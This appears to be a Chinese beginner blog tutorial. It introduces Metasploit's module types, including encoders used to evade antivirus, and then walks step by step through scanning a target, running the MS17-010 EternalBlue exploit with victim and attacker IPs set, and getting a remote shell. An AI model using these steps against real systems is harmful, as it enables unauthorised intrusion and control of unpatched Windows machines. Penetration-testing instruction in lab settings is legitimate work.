文章目录
- 一、Metasploit是什么?
- 1、Auxiliaries(辅助模块)
- 2、Exploit(渗透攻击模块)
- 3、payload(攻击载荷模块)
- 4、Post(后期渗透模块)
- 5、Encoder(编码工具模块)
- 二、Metasploit入侵步骤
- 1.准备
- 2.扫描端口
- 1、直接在metasploit框架里使用nmap扫描端口
- 3、查看版本
- 4、查找对应利用漏洞模块
- 5、shell
一、Metasploit是什么?
这里我简单介绍一下,方便你们小白了解(大佬直接跳过就行)
Metasploit框架是一个开源工具,旨在方便渗透测试,他是有ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发,使用定制的工具模板。Metasploit可向后端模块提供多种用来控制测试的接口。Metasploit还有第三方接口,如nmap、SQLMap,可以直接在控制台使用。
1、Auxiliaries(辅助模块)
该模块主要作用是扫描、嗅探、指纹识别辅佐渗透。
2、Exploit(渗透攻击模块)
该模块里面包含许多类型模块,渗透测试者利用这些模块多漏洞进行利用
3、payload(攻击载荷模块)
该模块用于渗透攻击成功之后,在目标系统执行任意命令或者执行特点代码,总结来说就是建立目标机与攻击机稳定连接,可返回shell或进行注入
4、Post(后期渗透模块)
该模块主要用于在获取目标系统远程控制权后,进行一系列的后渗透攻击动作,如获取敏感信息、实施跳板攻击。
5、Encoder(编码工具模块)
该工具在渗透测试中负责免杀,以防止被杀毒软件、防火墙、IDS及类似的安全软件检测出来
。
二、Metasploit入侵步骤
1.准备
1、首先你要确定两台主机在同一网段,并且能够ping通,这些我就不做演示了
2、更新软件
apt-get update
apt-get upgrade
3、msfconsole
:打开metasploit
2.扫描端口
1、直接在metasploit框架里使用nmap扫描端口
你们也可以使用模块进行扫描
nmap -p 1-65535 -Pn 192.168.0.1
3、查看版本
1、search scanner/smb/smb_
2、use 7 -->show options -->set rhosts 192.168.0.1 -->run
4、查找对应利用漏洞模块
1、search exploit/windows/smb/
2、use exploit/windows/smb/ms17_010_eternalblue-->set rhost靶机ip-->set lhost 攻击机ip
我不知道你们这里的payload是不是主动配置的或者加上去的,我这由于以前玩过,不太清楚,如果不是或有问题请告知。
3、这里我们就成功了
5、shell
到了这一步就随便你们怎么玩了!
shell --> chcp 65001
注:如果我这里讲的有哪里不太详细、遗漏或错误,请及时告知。Thanks♪(・ω・)ノ!